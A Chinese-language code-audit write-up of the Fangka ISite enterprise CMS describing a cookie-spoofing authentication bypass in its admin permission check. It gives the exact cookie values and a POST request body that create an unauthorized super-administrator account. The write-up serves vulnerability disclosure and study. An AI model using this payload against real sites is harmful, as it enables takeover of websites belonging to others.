方卡ISite企业建站系统代码审计

##0x01 前言
ISite企业建站系统是方卡在线独立开发的一套为公司企业量身打造的建站系统,系统维护简单,支持全站生成HTML,支持自定义文件名。

##0x02 环境搭建
ISite官网:http://www.fangka.net/
程序源码:20111010
下载地址:http://qy.ifangka.com/download.html

##0x03 cookie欺骗
代码分析
在后台目录中,所有文件都在第一行包含admincheck.asp进行权限检测。

进一步追溯admincheck函数,在include.asp文件中

继续 ,在/class/Cls_admin.asp中

根据说明可知AdminCheck函数先进行登录检测,在进行其余权限检测。且179行以及217行通过判断cookie是否为空,如果不为则进行下一步。这就造成了我们可以在本地添加cookie从而绕过权限判断。

由上述可知,第一步先传入CheckType=1判断是否登录,在传入CheckType=2进行二次检测。最后传入CheckType=3判断是否具有页面权限。因此我们在本地添加相应的cookie值即可绕过判断。

##漏洞利用

访问后台登录页面
使用firebug添加两个Cookies及其内容
分别是: FkAdminLimitId=0; FkAdminId=1
接着向/admin/Admin.asp?Type=3 提交POST数据
Fk_Admin_LoginName=admin1&Fk_Admin_LoginPass1=123456&Fk_Admin_LoginPass2=123456&Fk_Admin_Name=admin1&Fk_Admin_Limit=0&Fk_Admin_User=1&Enter=%E6%AD%A3%E5%9C%A8%E6%8F%90%E4%BA%A4
即添加了账号为admin1密码为123456的超级管理员用户。